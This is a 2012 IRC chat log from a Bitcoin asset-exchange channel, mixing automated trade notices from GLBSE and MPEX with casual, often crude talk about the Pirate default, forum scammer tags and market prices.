05:42:30 now that's a horse of a different color Aug 27 05:43:03 what leads to it looking like that? Aug 27 05:43:12 and this one: http://upload.wikimedia.org/wikipedia/commons/1/1f/Wismut_Kristall_und_1cm3_Wuerfel.jpg Aug 27 05:43:21 this one is artificial apparently Aug 27 05:43:29 they're bismuth crystals Aug 27 05:43:36 the color comes from oxidation Aug 27 05:43:44 reflect various hues Aug 27 05:43:49 it's an "OG" fractal! Aug 27 05:44:40 looks like oil marks in water Aug 27 05:44:49 or soap bubbles Aug 27 05:44:55 yes, but much more defined Aug 27 05:47:16 [GLBSE] [PLATINUM] 169 @ 0.01 = 1.69 BTC [+] Aug 27 05:47:35 [GLBSE] [JAH] 2 @ 0.16 = 0.32 BTC [-] Aug 27 05:47:42 Bismuth is beautiful Aug 27 05:48:20 It's actually quite dull when plain ore Aug 27 05:48:40 [MPEX] [S.MPOE] 24330 @ 0.00038419 = 9.3473 BTC [-] Aug 27 05:57:08 [GLBSE] [PUREMINING] 1 @ 0.0802 BTC [-] Aug 27 06:06:43 [MPEX] [F.GIGA.ETF] 11938 @ 0.00097669 = 11.6597 BTC [+] Aug 27 06:10:37 [MPEX] [O.BTCUSD.P090N] 5 @ 0.12974999 = 0.6487 BTC [-] Aug 27 06:22:34 ahaha. over one million orders processed. Aug 27 06:23:18 heh Aug 27 06:23:21 botsh Aug 27 06:23:44 myea. Aug 27 06:24:20 .py 10^6 / (3600 * 24 * 30 *4) Aug 27 06:24:21 10 Aug 27 06:24:25 one million orders? Aug 27 06:24:26 for what? Aug 27 06:24:33 average ten orders a second for the past 4 months eh. Aug 27 06:24:41 .py 10^6 / (3600 * 24 * 30 *4.0) Aug 27 06:24:41 TypeError: unsupported operand type(s) for ^: 'int' and 'float' Aug 27 06:24:48 .py (10^6) / (3600 * 24 * 30 *4.0) Aug 27 06:24:49 1.15740740741e-06 Aug 27 06:24:55 um Aug 27 06:25:15 mno. one every 10 seconds. Aug 27 06:25:19 that sounds moar like it. Aug 27 06:25:33 EmanuelDeOrtego for mpex stuff. Aug 27 06:25:36 Ah. Aug 27 06:26:19 the entire client facing part just got some massive upgrade Aug 27 06:26:32 to make the site not be slow anymore. Aug 27 06:27:15 course it wasn't actually slow. Aug 27 06:29:22 [GLBSE] [HYDRO.BONDS] 2 @ 1.5601 = 3.1202 BTC [-] Aug 27 06:29:23 [GLBSE] [HYDRO.BONDS] 2 @ 1.56 = 3.12 BTC [-] Aug 27 06:30:49 when I see that ^ Aug 27 06:30:58 it makes me think it's raising funds for a hydro op Aug 27 06:31:51 [GLBSE] [GIGAMINING] 1 @ 0.9739 BTC [+] Aug 27 06:36:12 [GLBSE] [TYGRR.BOND-P] 63 @ 0.33 = 20.79 BTC [+] Aug 27 06:36:53 [MPEX] [S.DICE] 100 @ 0.0034 = 0.34 BTC [+] Aug 27 06:42:11 [GLBSE] [TYGRR.BOND-P] 10 @ 0.34 = 3.4 BTC [+] Aug 27 06:43:14 it's not ? Aug 27 06:43:33 ;;topic Aug 27 06:43:34 Bitcoin asset exchanges: GLBSE https://glbse.com || MPEx http://polimedia.us/mpex || CST https://cryptostocks.com || ICBIT https://icbit.se || list bot commands: !help || Streaming trades only: #bitcoin-assets-trades || a biased message: http://smpake.com/ || Net Chart: http://bit.ly/RMjqah Aug 27 06:45:16 [GLBSE] [SILVER] 10 @ 0.00999999 = 0.1 BTC [-] Aug 27 06:47:44 [GLBSE] [CIUCIU.MINING] 21 @ 0.098 = 2.058 BTC [+] Aug 27 06:47:45 [GLBSE] [CIUCIU.MINING] 9 @ 0.099 = 0.891 BTC [+] Aug 27 07:00:53 [MPEX] [O.BTCUSD.P110N] 2 @ 0.24775052 = 0.4955 BTC [-] Aug 27 07:01:47 [GLBSE] [PUREMINING] 43 @ 0.098 = 4.214 BTC [+] Aug 27 07:04:03 [GLBSE] [PUREMINING] 22 @ 0.09948 = 2.1886 BTC [+] **** BEGIN LOGGING AT Mon Aug 27 15:36:08 2012 Aug 27 15:36:37 lots of things have been said Aug 27 15:36:52 but no, almost nothing has been paid bak and pirate is saying he is running behind Aug 27 15:39:25 [GLBSE] [BIB.PIRATE] 4 @ 0.265 = 1.06 BTC [+] Aug 27 15:39:44 So people had seriously invested 5 million $ in his "scheme"? Aug 27 15:40:06 [MPEX] [S.BVPS] 250 @ 0.00352303 = 0.8808 BTC [+] Aug 27 15:40:17 and why is this bot called assbot??? Aug 27 15:40:53 no - probably most f the 5M$ is the intrest. Aug 27 15:42:54 Transisto yes. Aug 27 15:43:23 and the bot is called assbot cause we don't like tits around these here parts. Aug 27 15:44:02 lol Aug 27 15:44:05 good morning xD Aug 27 15:44:38 [GLBSE] [GIGAMINING] 1 @ 0.9699 BTC [-] Aug 27 15:44:39 hehe hi Aug 27 15:44:40 [GLBSE] [GIGAMINING] 4 @ 0.97 = 3.88 BTC [+] Aug 27 15:45:28 morning Aug 27 15:45:38 hows it going fellas Aug 27 15:45:59 it would be better if pirate paid out Aug 27 15:46:04 [MPEX] [S.MPOE] 16100 @ 0.00038226 = 6.1544 BTC [-] Aug 27 15:46:38 Chaang-Noi i seriously think by now (next monday) all pirate debt has to be provisioned for / downgraded to $0 in accounting sheets. Aug 27 15:46:42 did you have any private talk with him Chaang-Noi Aug 27 15:47:18 [GLBSE] [GIGAMINING] 1 @ 0.97 BTC [+] Aug 27 15:47:25 no talks no Aug 27 15:47:40 downgrade to $0 on what? Aug 27 15:47:58 i have already done that on my personal books if that is what you are talking about Aug 27 15:48:08 but i cant set the bonds to nothing Aug 27 15:48:36 [GLBSE] [BIB.PIRATE] 1 @ 0.3399 BTC [+] Aug 27 15:49:25 Chaang-Noi ya that's what i meant. Aug 27 15:49:30 [MPEX] [S.MPOE] 35835 @ 0.00038325 = 13.7338 BTC [+] Aug 27 15:50:09 ;;ticker Aug 27 15:50:10 Best bid: 11.7121, Best ask: 11.83642, Bid-ask spread: 0.12432, Last trade: 11.7121, 24 hour volume: 100168, 24 hour low: 10.52, 24 hour high: 12.14999 Aug 27 15:50:10 wtf Aug 27 15:50:13 ?? Aug 27 15:50:16 It's Pirate Aug 27 15:50:21 He doesn't have the coins Aug 27 15:50:24 Thus UP UP UP Aug 27 15:50:26 duh Aug 27 15:50:39 finally realizing its aponzi? Aug 27 15:50:39 im not so sure its him Aug 27 15:50:41 mircea i did that like 5 days ago... Aug 27 15:51:02 this will be the bigest scam since bitcoinica Aug 27 15:51:06 i don't think it's him either. Aug 27 15:51:09 since? lol Aug 27 15:51:09 The market has written off the losses Aug 27 15:51:10 market was on an upswing. Aug 27 15:51:20 the guy sold out his remaning coins, causeda little panic, he's out of the picture Aug 27 15:51:21 i think biggest scam ever in btc land Aug 27 15:51:26 (with about 500k - 1mn of investor's money0 Aug 27 15:51:30 and now we're headed back to 15. Aug 27 15:51:33 [GLBSE] [DMC] 60 @ 0.06 = 3.6 BTC [+] Aug 27 15:51:35 most of that was interest Aug 27 15:51:49 indeed Aug 27 15:53:16 i woner if it's the last big scam. Aug 27 15:53:27 as the value of btc goes up and people stop being forum retards it might be the case. Aug 27 15:53:51 "I know you guys want updates and communication, but I'm somewhat muted by the personal attacks and legalities of whats going on. There is a lot more to this story than just "Send me back my coins." If I had all the coins just sitting around I would've has this wrapped up a long time ago. Aug 27 15:53:51 " Aug 27 15:53:53 lol Aug 27 15:54:02 lolz Aug 27 15:54:31 I believed in Pirate before. He had a good mouth. Aug 27 15:54:45 Now I see he's a load of shit. Aug 27 15:55:55 [GLBSE] [GSDPT] 4000 @ 0.0034 = 13.6 BTC [+] Aug 27 15:56:03 finally ding ding we have a winner Aug 27 15:56:45 Matthew is going to be out $130k Aug 27 15:57:29 EmanuelDeOrtego he;'s just a liar. Aug 27 15:57:41 he's not going to be out $5 of his own money on the grounds he never had $5. Aug 27 15:57:46 both matthew and pirate lol Aug 27 15:58:14 [GLBSE] [BIB.PIRATE] 6 @ 0.32 = 1.92 BTC [-] Aug 27 15:58:25 !ticker gsdpt Aug 27 15:58:28 [GLBSE:GSDPT] [Bid: 0.0032] [Ask: 0.0034] [Spread: 0.0002] [Last: 0.0034] [24hVol: 210.8316] [7dAvg: 0.00375385] Aug 27 15:58:46 "legalities" Aug 27 15:58:46 [GLBSE] [YABMC] 6 @ 0.13476 = 0.8086 BTC [-] Aug 27 15:59:18 i highly doubt matthew will pay the money owed withine 30 days Aug 27 15:59:32 well presumably people betting with him used an escrow. Aug 27 15:59:42 nope Aug 27 15:59:44 i tried Aug 27 15:59:46 he wont do it Aug 27 15:59:48 ahahaha Aug 27 15:59:49 scammer. Aug 27 15:59:56 he will for like 5 btc but nothing over 100 Aug 27 16:00:03 right. Aug 27 16:00:16 its perfect he either wins so much money or he just gets a scammer tag... Aug 27 16:00:26 which he should have anyway, so. Aug 27 16:00:28 everyone sees him as a troll scammer anyway Aug 27 16:00:32 yea. Aug 27 16:00:38 I'll be disappointed in him if that's the case. Aug 27 16:00:43 it's ok, he'll pay everyone in magazines. Aug 27 16:00:48 but anything goes in today's world. Aug 27 16:00:58 Men used to live and die by their reputation. Aug 27 16:01:05 EmanuelDeOrtego they still do. men, that is. Aug 27 16:01:43 i think one unavoidable consequence of the bitcoin new world will be honor suicides will come back in a big way. Aug 27 16:05:20 Eskimo-Bob is trying to tell Evoorhees how to run his company Aug 27 16:05:50 and that if he doesn't sell the remainder of the stock, he doesn't get its respective profits :/ Aug 27 16:06:12 one can only hope ;-D Aug 27 16:08:02 [MPEX] [S.MPOE] 8342 @ 0.00038325 = 3.1971 BTC [+] Aug 27 16:08:03 [MPEX] [S.MPOE] 15735 @ 0.00038481 = 6.055 BTC [+] Aug 27 16:08:05 [MPEX] [S.MPOE] 18623 @ 0.0003857 = 7.1829 BTC [+] Aug 27 16:08:16 EmanuelDeOrtego EskimoBob knows a lot about things he has no ideea about. Aug 27 16:08:21 [GLBSE] [TYGRR.BOND-P] 1 @ 0.3202 BTC [-] Aug 27 16:08:22 [GLBSE] [TYGRR.BOND-P] 1 @ 0.3201 BTC [-] Aug 27 16:09:32 meanwhile im over 100k option contracts traded this month Aug 27 16:09:43 which makes it something like... the sum of all history i think ? Aug 27 16:11:38 haha 13k in july, 11k in june, 5k in may. yyyyyy...eah! Aug 27 16:11:57 25k in april. Aug 27 16:14:04 wonder how much of that is pirate? :) Aug 27 16:14:17 < Chaang-Noi> i highly doubt matthew will pay the money owed withine 30 days << does this mean the pirate issue is settled? he defaulted? Aug 27 16:14:30 [MPEX] [S.MPOE] 6500 @ 0.00038226 = 2.4847 BTC [-] Aug 27 16:14:31 [MPEX] [S.MPOE] 31300 @ 0.00038112 = 11.9291 BTC [-] Aug 27 16:14:33 [MPEX] [S.MPOE] 17200 @ 0.00038081 = 6.5499 BTC [-] Aug 27 16:16:13 pirate defaulted, will pirate ever pay back all his debt? who knows... Aug 27 16:17:18 its official now? Aug 27 16:17:25 [GLBSE] [STANDARD.GOLD] 42 @ 0.000053 = 0.0022 BTC [-] Aug 27 16:17:27 [GLBSE] [STANDARD.GOLD] 88 @ 0.0000535 = 0.0047 BTC [+] Aug 27 16:17:27 [GLBSE] [STANDARD.GOLD] 131 @ 0.000056 = 0.0073 BTC [+] Aug 27 16:17:28 [GLBSE] [STANDARD.GOLD] 139 @ 0.000059 = 0.0082 BTC [+] Aug 27 16:17:36 [GLBSE] [TYGRR.BOND-P] 1 @ 0.3202 BTC [+] Aug 27 16:17:38 [GLBSE] [TYGRR.BOND-P] 11 @ 0.3201 = 3.5211 BTC [-] Aug 27 16:18:08 [GLBSE] [ASICMINER] 6 @ 0.09 = 0.54 BTC [+] Aug 27 16:19:18 [MPEX] [S.MPOE] 200 @ 0.00038081 = 0.0762 BTC [-] Aug 27 16:19:19 [MPEX] [S.MPOE] 19727 @ 0.00038066 = 7.5093 BTC [-] Aug 27 16:19:52 i don't think nanotube alloted his bet yet, but on the other hand... it's monday. full week passed. Aug 27 16:20:08 he has another week afaik Aug 27 16:20:19 bet default is 14 days Aug 27 16:20:52 [GLBSE] [DMC] 12 @ 0.06 = 0.72 BTC [+] Aug 27 16:21:21 nanotube so if he hasn't paid in full by the 2nd or something, you're paying out ? Aug 27 16:21:37 [GLBSE] [PUREMINING] 3 @ 0.09 = 0.27 BTC [-] Aug 27 16:21:54 I really hope Matthew pays since he'll have to place a market order. Aug 27 16:22:20 ;;ticker Aug 27 16:22:21 Best bid: 11.60128, Best ask: 11.6898, Bid-ask spread: 0.08852, Last trade: 11.60128, 24 hour volume: 102320, 24 hour low: 10.52, 24 hour high: 12.14999 Aug 27 16:22:26 o whoa, a dollar while i slept ? Aug 27 16:22:39 how could one not love btc, goes to bed worth 5 mn, wakes up worth 5.5 mn Aug 27 16:22:53 heh Aug 27 16:23:06 I R MAEK MONY WHILE I SLEEP Aug 27 16:23:07 earliest recorded withdrawal request must be paid out by aug29. Aug 27 16:23:38 [GLBSE] [GMVT-BOT] 10 @ 0.132 = 1.32 BTC [-] Aug 27 16:23:38 [GLBSE] [GMVT-BOT] 50 @ 0.132 = 6.6 BTC [-] Aug 27 16:23:40 [GLBSE] [GMVT-BOT] 4 @ 0.1310001 = 0.524 BTC [-] Aug 27 16:23:41 [GLBSE] [GMVT-BOT] 1 @ 0.131 BTC [-] Aug 27 16:23:42 [GLBSE] [GMVT-BOT] 35 @ 0.13 = 4.55 BTC [-] Aug 27 16:23:54 nanotube is it something like 15 btc or w/e ? Aug 27 16:24:46 YAY Aug 27 16:24:51 GMVT-BOT finally crashes Aug 27 16:26:40 mircea_popescu: i'm not sure of the size of it. it was made by payb.tc Aug 27 16:27:20 well at any rate, im sure more cam in during the interval. the entire thing is for this to not drag on for months Aug 27 16:27:26 it will depress markets. Aug 27 16:27:42 if it gets called by early september that's jus' fine. Aug 27 16:28:13 [GLBSE] [GSDPT] 17 @ 0.0034 = 0.0578 BTC [+] Aug 27 16:29:08 People will give up by mid-September Aug 27 16:29:31 [GLBSE] [GIGAMINING] 1 @ 0.95262 BTC [-] Aug 27 16:29:31 [GLBSE] [GIGAMINING] 4 @ 0.95261 = 3.8104 BTC [-] Aug 27 16:29:33 [GLBSE] [GIGAMINING] 10 @ 0.9525 = 9.525 BTC [-] Aug 27 16:29:34 [GLBSE] [GIGAMINING] 5 @ 0.95231 = 4.7616 BTC [-] Aug 27 16:29:35 [GLBSE] [GIGAMINING] 6 @ 0.951 = 5.706 BTC [-] Aug 27 16:29:36 [GLBSE] [GIGAMINING] 4 @ 0.9506 = 3.8024 BTC [-] Aug 27 16:29:38 [GLBSE] [GIGAMINING] 1 @ 0.9505 BTC [-] Aug 27 16:29:39 [GLBSE] [GIGAMINING] 6 @ 0.95001 = 5.7001 BTC [-] Aug 27 16:29:40 [GLBSE] [GIGAMINING] 9 @ 0.93 = 8.37 BTC [-] Aug 27 16:29:41 [GLBSE] [GIGAMINING] 22 @ 0.928 = 20.416 BTC [-] Aug 27 16:29:41 [GLBSE] [GIGAMINING] 4 @ 0.911 = 3.644 BTC [-] Aug 27 16:29:46 i think the guy is hell bent on doing a full fledged stockholm syndrome thing. Aug 27 16:30:19 [GLBSE] [OBSI.HRPT] 4 @ 0.104 = 0.416 BTC [-] Aug 27 16:30:29 [MPEX] [F.GIGA.ETF] 6100 @ 0.00094423 = 5.7598 BTC [+] Aug 27 16:30:31 [MPEX] [F.GIGA.ETF] 11500 @ 0.00094196 = 10.8325 BTC [-] Aug 27 16:30:32 [MPEX] [F.GIGA.ETF] 6680 @ 0.00093931 = 6.2746 BTC [-] Aug 27 16:30:33 [MPEX] [F.GIGA.ETF] 15600 @ 0.0009391 = 14.65 BTC [-] Aug 27 16:30:35 [MPEX] [F.GIGA.ETF] 3428 @ 0.00093592 = 3.2083 BTC [-] Aug 27 16:30:35 [MPEX] [F.GIGA.ETF] 1000 @ 0.00093588 = 0.9359 BTC [-] Aug 27 16:30:36 [MPEX] [F.GIGA.ETF] 5692 @ 0.00093293 = 5.3102 BTC [-] Aug 27 16:30:38 [GLBSE] [TYGRR.BOND-P] 2 @ 0.4629 = 0.9258 BTC [+] Aug 27 16:30:59 [MPEX] [F.GIGA.ETF] 367 @ 0.00093293 = 0.3424 BTC [-] Aug 27 16:31:00 [MPEX] [F.GIGA.ETF] 15800 @ 0.00092334 = 14.5888 BTC [-] Aug 27 16:31:02 [MPEX] [F.GIGA.ETF] 11664 @ 0.00092305 = 10.7665 BTC [-] Aug 27 16:31:02 [MPEX] [F.GIGA.ETF] 3600 @ 0.00091823 = 3.3056 BTC [-] Aug 27 16:31:03 [MPEX] [F.GIGA.ETF] 18569 @ 0.00091667 = 17.0216 BTC [-] Aug 27 16:31:36 "I proved how week you all are. Now I will be taking your money as compensation." Aug 27 16:31:41 weak* Aug 27 16:31:57 shut up and keep buying up bitcoins. :) Aug 27 16:32:10 seize them and bring them to mee Aug 27 16:32:24 no but srsly, he'll prolly issue collectible printed certificates of 7% interest Aug 27 16:32:27 before it's all done. Aug 27 16:32:37 I would lol so hard Aug 27 16:32:46 ppl'd be like... all keeping the shit Aug 27 16:32:59 twenty years from now, crazy old cat lady dies in manhattan Aug 27 16:33:03 they find a drawerfull of the shit Aug 27 16:33:48 Honestly, when people go as far to sell their debt with him at 50% off.... Aug 27 16:33:54 I think he's pretty much done. Aug 27 16:33:59 you mean 75% Aug 27 16:34:04 I just think people can smell the reality. Aug 27 16:34:34 [GLBSE] [YARR] 19 @ 0.998999 = 18.981 BTC [+] Aug 27 16:34:39 so yesterday i threw a shit fit cause i was sick of the 3 month long draught and threatened to live the country Aug 27 16:34:44 [GLBSE] [ASICMINER] 138 @ 0.09 = 12.42 BTC [+] Aug 27 16:34:48 it started raining last night and it has been raining continuously since. Aug 27 16:35:05 You can think HAARP for rationing your rain like that. Aug 27 16:35:09 i hope i didn't break anything. Aug 27 16:35:25 EmanuelDeOrtego nah, just shitty draughty plain. think kentucky. Aug 27 16:36:05 obviously s/draught/drought wtf Aug 27 16:37:17 Yes : ) Aug 27 16:38:20 Is DeaDTerra going to continue to buy from MPeX and put it on the GLBSE? Aug 27 16:38:37 For Satoshi Dice that is Aug 27 16:38:41 [MPEX] [F.GIGA.ETF] 431 @ 0.00091667 = 0.3951 BTC [-] Aug 27 16:38:43 [MPEX] [F.GIGA.ETF] 9454 @ 0.00091642 = 8.6638 BTC [-] Aug 27 16:38:44 [MPEX] [F.GIGA.ETF] 115 @ 0.00091526 = 0.1053 BTC [-] Aug 27 16:38:52 i imagine so. Aug 27 16:39:26 ;;ticker Aug 27 16:39:27 Best bid: 11.61038, Best ask: 11.699, Bid-ask spread: 0.08862, Last trade: 11.69898, 24 hour volume: 102868, 24 hour low: 10.52, 24 hour high: 12.14999 Aug 27 16:40:28 [GLBSE] [ASICMINER] 1 @ 0.09 BTC [+] Aug 27 16:41:09 Hi usagi Aug 27 16:42:01 lol somebody bought one share of ASICMINER, ja. It is so small. Oh little ASICMINER share, I think I hear your mommy calling. Aug 27 16:42:37 lol Aug 27 16:42:43 I don't know why people do that Aug 27 16:43:10 usagi some people buy 1 share of gsdpt Aug 27 16:43:13 it's even smaller. Aug 27 16:43:43 "Whoo, I bought one share! I am an investor now!" Aug 27 16:43:59 "Maybe it will grow 1000x its value!" Aug 27 16:44:17 in which case it will buy a dinner. Aug 27 16:45:15 https://www.youtube.com/watch?v=WAUmD8EjUbk Aug 27 16:46:07 [MPEX] [O.BTCUSD.C100T] 219 @ 0.14572859 = 31.9146 BTC [+] Aug 27 16:47:35 yest puts were selling like crazy Aug 27 16:47:38 nao we move on to calls ? Aug 27 16:49:18 [GLBSE] [GOLD] 9 @ 0.00989 = 0.089 BTC [-] Aug 27 16:52:04 lol Aug 27 16:53:10 https://bitcointalk.org/index.php?topic=82572.0 Aug 27 16:53:16 3000 BTC left until we hit $12 Aug 27 16:53:17 theymos starting the ppts Aug 27 16:53:21 if anyone is interested Aug 27 16:53:26 we already hit 12 Aug 27 16:53:43 ;;ticker Aug 27 16:53:44 Best bid: 11.56, Best ask: 11.6, Bid-ask spread: 0.04000, Last trade: 11.56, 24 hour volume: 103844, 24 hour low: 10.52, 24 hour high: 12.14999 Aug 27 16:53:45 Well, you know, again. Aug 27 16:54:29 https://bitcointalk.org/index.php?topic=101554.0 Aug 27 16:54:33 This is a funny thread Aug 27 16:56:51 lol Aug 27 16:57:13 Chaaang-Noi is a necrophile Aug 27 16:57:22 :) Aug 27 16:57:29 just wantedpeople to see it Aug 27 16:57:42 they are starting to try to get scammer tags for people who did ppts Aug 27 16:57:54 just wanted to let people know theymos asked for them... Aug 27 16:58:34 [GLBSE] [DMC] 1 @ 0.06 BTC [+] Aug 27 16:58:52 o, the mood turned that ugly already ? Aug 27 16:59:01 thats actually great news, Goat Aug 27 16:59:43 [GLBSE] [OBSI.1MHS] 1 @ 0.096 BTC [+] Aug 27 17:00:14 i remember back in april was it ? when the girl called the "banker" consortium on the forum i dun recall what Aug 27 17:00:22 and they were all sanctimonious and "professional" Aug 27 17:01:03 [GLBSE] [GOLD] 1 @ 0.00989 BTC [-] Aug 27 17:01:41 what's bitcoin max ? Aug 27 17:02:07 [GLBSE] [TYGRR.BOND-P] 1 @ 0.3202 BTC [-] Aug 27 17:02:09 [GLBSE] [TYGRR.BOND-P] 8 @ 0.3201 = 2.5608 BTC [-] Aug 27 17:02:10 [GLBSE] [TYGRR.BOND-P] 7 @ 0.32 = 2.24 BTC [-] Aug 27 17:02:11 [GLBSE] [TYGRR.BOND-P] 7 @ 0.3151 = 2.2057 BTC [-] Aug 27 17:02:12 [GLBSE] [TYGRR.BOND-P] 100 @ 0.31 = 31 BTC [-] Aug 27 17:02:13 [GLBSE] [TYGRR.BOND-P] 7 @ 0.3 = 2.1 BTC [-] Aug 27 17:03:00 MrTiggr why good news? Aug 27 17:03:29 since pirate's BST is closing, bitcoin max will also be closing Aug 27 17:03:29 all accounts will have their deposits returned starting next week, as the coins come in from pirate. Aug 27 17:03:32 ahahaah oooookay. Aug 27 17:03:33 well, not necessarilty for that particular reason .. but the addition of scammer tags Aug 27 17:03:45 you think theymos will get a scammers tag? Aug 27 17:04:02 id rather not speculate Aug 27 17:04:08 "I am now reducing my offer (except for people I've already agreed to a deal with via PM). I will buy a BitcoinMax account for 9% of the balance." Aug 27 17:04:11 do you know who Theymos is? Aug 27 17:04:20 yes ofc Aug 27 17:04:20 [GLBSE] [ASICMINER] 2 @ 0.09887 = 0.1977 BTC [+] Aug 27 17:04:21 [GLBSE] [SILVER] 1 @ 0.00999999 BTC [-] Aug 27 17:04:31 ? Aug 27 17:04:55 and you think theymos might get a scammers tag on his own forum? Aug 27 17:05:15 well i doubt it , its not the sort of thing i would comment on tho Aug 27 17:05:23 lol Aug 27 17:05:43 would you comment on if you think matthew w will pay his bet if he will lose? Aug 27 17:06:10 i would not comment Aug 27 17:06:16 poor tiggr. Aug 27 17:06:26 why would he comment ? what's he to do with the entiore thing ? Aug 27 17:06:28 im too fat from eating popcoin already Aug 27 17:06:44 he said it was good news Aug 27 17:06:51 lol Aug 27 17:06:53 thats actually great news, Goat Aug 27 17:06:58 the addition of a scammer tag to the forums in general, yes Aug 27 17:07:00 i just dont understand who its good for Aug 27 17:07:15 lmao, mark the entire forum as scammers ? Aug 27 17:07:16 the whole forum should ahve a scammers tag? Aug 27 17:07:22 ahahaha Aug 27 17:07:28 yeah im loling too Aug 27 17:07:34 no, ? is there that function already ? Aug 27 17:07:39 to tag as scammer Aug 27 17:07:42 ivew not seen that Aug 27 17:07:45 wasn't it there for years ? Aug 27 17:07:57 *color me blind* Aug 27 17:08:00 ive not seen it Aug 27 17:08:02 im confused Aug 27 17:08:06 mr tiggr is not the person i thought he was Aug 27 17:08:09 i coulda sworn they had it Aug 27 17:08:11 if its been there for ages then im funny as hell Aug 27 17:08:14 he is either ignorant as fuck or a n00b Aug 27 17:08:19 ;;ident MrTiggr Aug 27 17:08:19 Nick 'MrTiggr', with hostmask 'MrTiggr!~MrTiggr@unaffiliated/mrtiggr', is not identified. Aug 27 17:08:32 this must not be the bitcoin police guy Aug 27 17:08:34 mmm, he's the guy with the graph robot etc no ? Aug 27 17:08:40 ya he is cause my chan id's him. Aug 27 17:08:47 hmmm Aug 27 17:08:56 yes thats me Aug 27 17:09:04 both treu , police and graphs Aug 27 17:09:17 ... Aug 27 17:09:18 i dont forum post much though Aug 27 17:09:27 i lost a whole lot of respect for you just now Aug 27 17:09:28 ive never noticed the ability to tag someone as a scammer Aug 27 17:09:30 apparently the forum is more irrelevant than i thought. Aug 27 17:09:36 yeah Aug 27 17:09:41 ^^ check my account Aug 27 17:09:44 i lost some respect for the forum as well Aug 27 17:09:49 i think ive posted like 5 times or sumthing Aug 27 17:09:58 hmm ok Aug 27 17:10:00 wel lanyway yes Aug 27 17:10:07 people can be tagged as a scammer Aug 27 17:10:11 nice Aug 27 17:10:16 pirate will be if he wont pay out Aug 27 17:10:19 well maybe Aug 27 17:10:21 zhou was not Aug 27 17:10:21 certainly Aug 27 17:10:25 intersango was not... Aug 27 17:10:27 ?? he wasnt Aug 27 17:10:40 not sooo surprized on intersango Aug 27 17:10:42 theymos was taking money from zhou to place adds Aug 27 17:10:44 but ZT didnt ? Aug 27 17:10:44 MrTiggr well, forum style. they have a tag, but they use it democratically. Aug 27 17:10:49 matthew w no longer has a scammer tag Aug 27 17:10:53 aaah NOW i see Aug 27 17:11:04 what happened at the forum? Aug 27 17:11:07 Chaaang-Noi hahaha he was de-scammerized ? hao ? Aug 27 17:11:19 matthew said sorry and paid back Aug 27 17:11:27 so, the scammer tag isnt being applied appropriately it would seem Aug 27 17:11:30 :P Aug 27 17:11:36 the forum is a fucking joke Aug 27 17:11:39 we need a new one... Aug 27 17:11:46 thats where i eat the most popcoin! Aug 27 17:11:48 :P Aug 27 17:11:49 if pirate will pay out ill fucking support one... Aug 27 17:11:49 Chaaang-Noi hey don't knock it, plenty of humour there albeit involuntary. Aug 27 17:11:53 how is the forum a joke? Aug 27 17:12:00 :) Aug 27 17:12:03 they should just merge it with SomethingAweful and be dun with it Aug 27 17:12:08 hctib collection of idiots too incompetent to realise they're incompetent going at complex subjects ? Aug 27 17:12:13 how could it NOT be Aug 27 17:12:48 only way to stop that is a by invitation only forum. Aug 27 17:13:10 Chaaang-Noi: if pirate pays out and you want to come good on that - i will put up the servers to host it Aug 27 17:13:32 MrTiggr i might do it anyway Aug 27 17:13:40 it will be invite only Aug 27 17:13:49 at first atleast... Aug 27 17:13:50 ^shout me if you do; im up for that Aug 27 17:13:54 why would intersango be tagged anyway ? they didn't do anything. Aug 27 17:14:01 lol Aug 27 17:14:13 is there a "got scammed" tag ? Aug 27 17:14:19 lol! Aug 27 17:14:26 now almost the whole forum would have that one... Aug 27 17:14:27 :) Aug 27 17:14:29 so should i throw up olympus on a server somewhere ? Aug 27 17:14:32 including me twice Aug 27 17:14:42 [MPEX] [S.MPOE] 24300 @ 0.00038112 = 9.2612 BTC [+] Aug 27 17:14:49 fool me once..... Aug 27 17:14:51 :P Aug 27 17:15:07 fool me can't get fooled again. Aug 27 17:15:12 hctib the problem with invite only forums is that they grow stale Aug 27 17:15:17 everyone agrees with everyone Aug 27 17:15:27 like SomethingAwful Aug 27 17:15:30 yes. Aug 27 17:15:36 ^^ see my comment before Aug 27 17:15:54 they should just merge it with SomethingAweful and be dun with it Aug 27 17:15:59 yeah. Aug 27 17:15:59 ;) Aug 27 17:16:12 mircea_popescu: good point. Aug 27 17:16:23 mircea_popescu: Tell evoorhees to launch his new site if he wants more sales. Aug 27 17:16:34 lol - interestingly ... i got a "lilke" from "CosbyCoin" today on the BitcoinAus site Aug 27 17:16:37 *like Aug 27 17:16:38 i don't even remember, when was it due ? Aug 27 17:16:49 Mid-Semptember Aug 27 17:16:53 Sept* Aug 27 17:16:54 well ? Aug 27 17:16:55 i wudnt be surprised if the SAGoons are stirring Aug 27 17:17:07 I am too impatient it seems Aug 27 17:17:24 I just want to make a quick move and get out of it. : P Aug 27 17:17:26 wohoo magicaltux is making a special api just for smpake ;) Aug 27 17:17:26 eh let him be, he ran the business up till now im sure he's gonna manage from now on Aug 27 17:17:36 kakobrekla cool! Aug 27 17:17:57 'gratz kakobrekla Aug 27 17:18:08 >as Meni Rosenfeld pointed out, the "insurance" is mostly meaningless and only makes figuring out the risk/reward more difficult. Aug 27 17:18:12 theymos Aug 27 17:18:14 ty :) Aug 27 17:18:17 ha Aug 27 17:18:27 DeadTerra has paid out Aug 27 17:18:30 as have Goat Aug 27 17:18:41 PPT I don't know yet Aug 27 17:19:00 are their insured bonds retired now ? Aug 27 17:19:11 I think so Aug 27 17:19:17 a, that is a good thing then. Aug 27 17:19:20 Chaaang-Noi: what was your insured PPT? Aug 27 17:19:30 PI Aug 27 17:19:35 ok Aug 27 17:19:36 see that bid wall Aug 27 17:19:36 and meni rosenfeld should get "pretentious dummy of the month" award. Aug 27 17:19:38 so I can freeze it? Aug 27 17:19:41 its to cover all shares Aug 27 17:19:49 nefario1 no Aug 27 17:19:50 i don't recall him saying something sensible, but he's got some airs about him something fierce. Aug 27 17:20:01 Chaaang-Noi: let me know when to retire any of your assets Aug 27 17:20:04 cuz i said if pirate did pay out i would pay a weeks interesy Aug 27 17:20:07 interest Aug 27 17:20:09 so... Aug 27 17:20:23 people are waiting cuz they might get .055 more per bond Aug 27 17:20:24 not yet Aug 27 17:20:35 ok Aug 27 17:20:37 yeah, lets just wait Aug 27 17:20:41 Chaaang-Noi i think many holders don't check their accounts too regularly. Aug 27 17:20:45 i dont want to go back on something i said in the forun Aug 27 17:20:48 hey, insureance doesn't make valuation more difficult if the company in question reports its financial status properly :P] Aug 27 17:20:50 forum Aug 27 17:23:40 [GLBSE] [BIB.PIRATE] 3 @ 0.2628 = 0.7884 BTC [-] Aug 27 17:23:41 [GLBSE] 